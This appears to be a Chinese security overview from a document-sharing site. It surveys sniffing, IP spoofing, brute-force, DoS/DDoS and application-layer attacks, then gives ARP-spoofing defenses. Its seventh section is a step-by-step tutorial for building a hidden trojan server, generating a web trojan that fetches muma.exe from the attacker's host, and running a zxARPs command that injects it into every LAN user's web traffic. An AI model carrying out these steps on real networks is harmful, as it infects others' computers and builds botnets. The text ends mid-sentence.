《常见黑客攻击与防范》由会员分享,可在线阅读,更多相关《常见黑客攻击与防范(14页珍藏版)》请在金锄头文库上搜索。
1、常见黑客攻击与防范、网络攻击常见的攻击分为“假冒型攻击”和“破坏型攻击”。假冒型攻击是黑客不知道你的账号,也不想破坏你的数据,但他 冒用你的名义向别人输送信息。预防假冒攻击可以借鉴网上银行的做 法,对传输通道进行加密。破坏型攻击是黑客为了达到个人目的,通过在网络上设置陷阱或 事先在生产或网络维护软件内置入逻辑炸弹或后门程序,在特定的时 间或特定条件下干扰网络正常运行,甚至会致使生产线或者网络完全 陷入瘫痪状态。还有一些黑客凭借高超的黑客技术,利用黑客技术搅 乱竞争对手的正常商业行为,个别顶尖黑客甚至能够侵入政府、军队 内部网络,破坏重大政治、军事信息,导致社会动荡和混乱。虽然黑客攻击的手法多种
2、多样,但就目前来说,绝大多数黑客们 所采用的手法和工具仍具有许多共性。从大的方面来划分的话,归纳 起来一般不外乎以下几种:1、网络嗅探其实最开始是应用于网络管理的,就像远程控制软件一样,但随 着黑客们的发现,这些强大的功能就开始被客们利用。最普遍的安全 威胁来自内部,同时这些威胁通常都是致命的,其破坏性也远大于外 部威胁。其中网络嗅探对于安全防护一般的网络来说,使用这种方法 操作简单,而且同时威胁巨大。很多黑客也使用嗅探器进行网络入侵 的渗透。网络嗅探器对信息安全的威胁来自其被动性和非干扰性,使 得网络嗅探具有很强的隐蔽性,往往让网络信息泄密变得不容易被发 现。嗅探器是利用计算机的网络接口,截
3、获目的计算机数据报文的一 种技术。不同传输介质的网络的可监听性是不同的。一般来说,以太网被监听的可能性比较高,因为以太网是一个广 播型的网络。FDDI Token 被监听的可能性也比较高,尽管它不是一个广播型 网络,但带有令牌的那些数据包在传输过程中,平均要经过网络上一 半的计算机。微波和无线网被监听的可能性同样比较高,因为无线电本身是一 个广播型的传输媒介,弥散在空中的无线电信号可以被很轻易的截 获。嗅探器工作在网络的底层,把受嗅探的计算机的网络传输全部数 据记录下来。虽然嗅探器经常被网管员用来进行网络管理,可以帮助 网络管理员查找网络漏洞和检测网络性能、分析网络的流量,以便找 出所关心的网
4、络中潜在的问题。但目前却在黑客中的应用似乎更加广 泛,使人们开始对这类工具敬而远之。2、IP 地址欺骗攻击是黑客们假冒受信主机(要么是通过使用你网络 IP 地址范围内 的 IP ,要么是通过使用你信任,并可提供特殊资源位置访问的外部 IP 地址)对目标进行攻击。在这种攻击中,受信主机指的是你拥有管 理控制权的主机或你可明确做出“信任”决定允许其访问你网络的主 机。通常,这种IP地址欺骗攻击局限于把数据或命令注入到客户/服 务应用之间,或对等网络连接传送中已存在的数据流。为了达到双向 通讯,攻击者必须改变指向被欺骗 IP 地址的所有路由表。 IP 地址攻 击可以欺骗防火墙,实现远程攻击。以上介绍
5、的报文嗅探,IP欺骗的攻击者不限于外部网络,在内部 网络中同样可能发生,所以在企业网络内部同样要做好相关防御措 施。3、密码攻击通过多种不同方法实现,包括蛮力攻击(brute force attack),特 洛伊木马程序,IP欺骗和报文嗅探。尽管报文嗅探和IP欺骗可以捕 获用户账号和密码,但密码攻击通常指的反复的试探、验证用户账号 或密码。这种反复试探称之为蛮力攻击。通常蛮力攻击使用运行于网 络上的程序来执行,并企图注册到共享资源中,例如服务器。当攻击 者成功的获得了资源的访问权,他就拥有了和那些账户被危及以获得 其资源访问权的用户有相同的权利。如果这些账户有足够夺得特权, 攻击者可以为将来的
6、访问创建一个后门,这样就不用担心被危及用户 账号的任何身份和密码的改变。4、拒绝服务(Denial of Service, DoS )攻击是目前最常见的一种攻击类型。从网络攻击的各种方法和所产生 的破坏情况来看, DoS 算是一种很简单,但又很有效的进攻方式。它 的目的就是拒绝你的服务访问,破坏组织的正常运行,最终使你的网 络连接堵塞,或者服务器因疲于处理攻击者发送的数据包而使服务器 系统的相关服务崩溃、系统资源耗尽。DoS 的攻击方式有很多种,最基本的 DoS 攻击就是利用合理的 服务请求来占用过多的服务资源,从而使合法用户无法得到服务。 DoS 攻击的基本过程:首先攻击者向服务器发送众多的
7、带有虚假地址 的请求,服务器发送回复信息后等待回传信息。由于地址是伪造的, 所以服务器一直等不到回传的消息,然而服务器中分配给这次请求的 资源就始终没有被释放。当服务器等待一定的时间后,连接会因超时 而被切断,攻击者会再度传送新的一批请求,在这种反复发送伪地址 请求的情况下,服务器资源最终会被耗尽。这类攻击和其他大部分攻击不同的是,因为他们不是以获得网络 或网络上信息的访问权为目的,而是要使受攻击方耗尽网络、操作系 统或应用程序有限的资源而崩溃,不能为其他正常其他用户提供服务 为目标。这就是这类攻击被称之为“拒绝服务攻击”的真正原因。当涉及到特殊的网络服务应用,象 HTTP 或 FTP 服务,
8、攻击者 能够获得并保持所有服务器支持的有用连接,有效地把服务器或服务 的真正使用者拒绝在外面。大部分拒绝服务攻击是使用被攻击系统整 体结构上的弱点,而不是使用软件的小缺陷或安全漏洞。然而,有些 攻击通过采用不希望的、无用的网络报文掀起网络风暴和提供错误的 网络资源状态信息危及网络的性能。5、DDoS (Distributed Denial of Service,分布式拒绝服务)也是一种基于 DoS 的特殊形式的分布、协作式的大规模拒绝服 务攻击。也就是说不再是单一的服务攻击,而是同时实施几个,甚至 十几个不同服务的拒绝攻击。由此可见,它的攻击力度更大,危害性 当然也更大了。它主要瞄准比较大的网
9、站,象商业公司,搜索引擎和 政府部门的Web站点。要避免系统遭受 DoS 攻击,从前两点来看,网络管理员要积极 谨慎地维护整个系统,确保无安全隐患和漏洞;而针对第四点第五点 的恶意攻击方式则需要安装防火墙等安全设备过滤 DoS 攻击,同时 强烈建议网络管理员定期查看安全设备的日志,及时发现对系统存在 安全威胁的行为。 具体的防火墙如何防御拒绝服务攻击的方法可以参见不同防火墙的 详细介绍。6、应用层攻击 能够使用多种不同的方法来实现,最平常的方法是应用服务器上 通常可找到的应用软件(如 SQL Server、Sendmail、PostScript 和 FTP) 缺陷。通过使用这些缺陷,攻击者能够
10、获得计算机的访问权,以及该 计算机上运行相应应用程序所需账户的许可权。应用层攻击的一种最新形式是使用许多公开化的新技术,如HTML规范、Web浏览器的操作性和HTTP协议等。这些攻击通过网 络传送有害的程序,包括JAVA applet和Active X控件等,并通过用 户的浏览器调用它们,很容易达到入侵、攻击的目的。虽然微软公司 前段时间提供的代码验证技术可以使用户的 Active X 控件因安全检 查错误而暂停这类攻击,但攻击者已经发现怎样利用适当标记和有大 量漏洞的 Active X 控件使之作为特洛伊木马实施新的攻击方式。这一 技术可使用 VBScript 脚本程序直接控制执行隐蔽任务,
11、如覆盖文件 执行其他文件等,预防、查杀的难度更大。在应用层攻击中,容易遭受攻击的目标包括路由器、数据库、Web和FTP服务器和与协议相关的服务,如DNS、WINS和SMB。 7、新的挂马方式 ARP 欺骗让网游玩家电脑被植入木马,从而发展更多“肉鸡”扩充实力。 此外,外挂、色情等不良网站也极易受到“肉鸡”控制者的攻击威胁, 这已是黑客论坛中公开的秘密。网页挂马最难的就是传播了,小网站易入侵但是访问人数不多, 收获的肉鸡也就不是很多。因此,一种新的挂马方式开始流行局 域网 ARP 欺骗挂马,只要局域网内一台机子中招了,它就可以在内 网传播含有木马的网页,捕获的肉鸡就会成几何增长。局域网 ARP
12、欺骗挂马的好处如下:无需入侵网站,只要你的主 机处于局域网中即可,这是它最大的优点;收获的肉鸡多多,短时间 内可以收获数十台甚至上百台肉鸡,类似网吧这样由上百台电脑组成 的局域网是最好的挂马场所;局域网内的用户访问任何网站都会中木 马。 配置挂马简单的步骤(以学习为目的,不要利用本技术干违法勾当) 第一步:配置木马服务端我们以“黑洞”木马为例。运行“黑洞”木马的Client.exe文件, 进入Client.exe的主界面后,点击“文件f创建DLL插入版本服务端 程序”。进入服务端程序的创建界面后,首先勾选“Win NT/2000/XP/2003 下隐藏服务端文件、注册表、进程和服务”,然后切换
13、到“连接选项” 标签,在“主机”一栏中填入本机的公网 IP 地址,端口可以保持默 认的“2007”。最后在“连接密码”处填入用来连接对方的密码,例 如 123456(图 1)。设置完成后点击“生成”按钮,将木马服务端保存为 muma.exe。图1 填写密码第二步:生成网页木马既然是挂马,那当然缺不了网页木马了。这里我们用“MS07-33 网马生成器”为例。运行“MS07-33网马生成器”,在“网马地址” 文本框中输入木马所在路径,由于等会我们要自行架设 Http 服务, 所以这里应该填入“http:/192.168.0.2/muma.exe “,其中 192.168.0.2 是本机在局域网中的
14、 IP 地址。点击“生成网马”按钮即可生成网马 hackll.htm(图 2)。图2点击“生成网马”第三步:开启本机Http服务要让局域网中的其他主机能够访问到我们的网马,就要开启本机 的Http服务。下载baby web server,这是一款简单的Web服务器软 件,下载后直接运行,在其主界面中点击“服务一设置”将“网页目录”设置为网页木马所在的地方,例如 C 盘根目录“C: “。点“确定”回主界面,然后再点“ Start”按钮开启本机的 Http服务(图3)。将木马服务端和网页木马放到C盘根目录。图3按钮开启本机的Http服务第四步:局域网挂马最后该请我们的主角出场了,就是上文中提到的小
15、工具,这个工 具叫zxARPs,是一个通过ARP欺骗实现局域网挂马的工具。在使用 zxARPs前我们要安装WinPcap,它是网络底层驱动包,没有它zxARPs 就运行不了。安装好后将 zxARPs 放到任意目录,然后运行“命令提示符”, 进入zxARPs所在的目录,然后输入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert 。回车后挂马就成功了。从现在开始,局域网中的用户无论访问什么网站,都会运行我们 的网页木马,因为zxARPs在用户打开网页的同时已经将挂马代码插 入到正常网页中了。二、攻击防范1、ARP
16、挂马防范技巧从上文可见zxARPs的功能真的十分强大,但它毕竟是基于ARP 欺骗原理的,只要局域网内的主机能够抵御ARP欺骗攻击,就可以 完全无视zxARPs的挂马方法。网管将局域网内所有的主机的 IP 地址和 MAC 地址进行绑定即 可搞定。我们也可以下载“360ARP防火墙”来抵御ARP欺骗攻击(下 载地址http:/ 启”按钮就可以让它保护我们免受ARP欺骗的攻击了(图4)。这时如 果有人对你的主机进行 ARP 欺骗攻击,我们在可以点击“记录”按 钮,查看攻击者的IP地址。开启ARP保护ARP欺骗可以实现多种攻击效果,本文介绍ARP欺骗挂马的只 是其中的一种攻击方式,此外还有信息嗅探,主机网络限制等攻击方 法。可见, ARP 欺骗是局域网的头号大
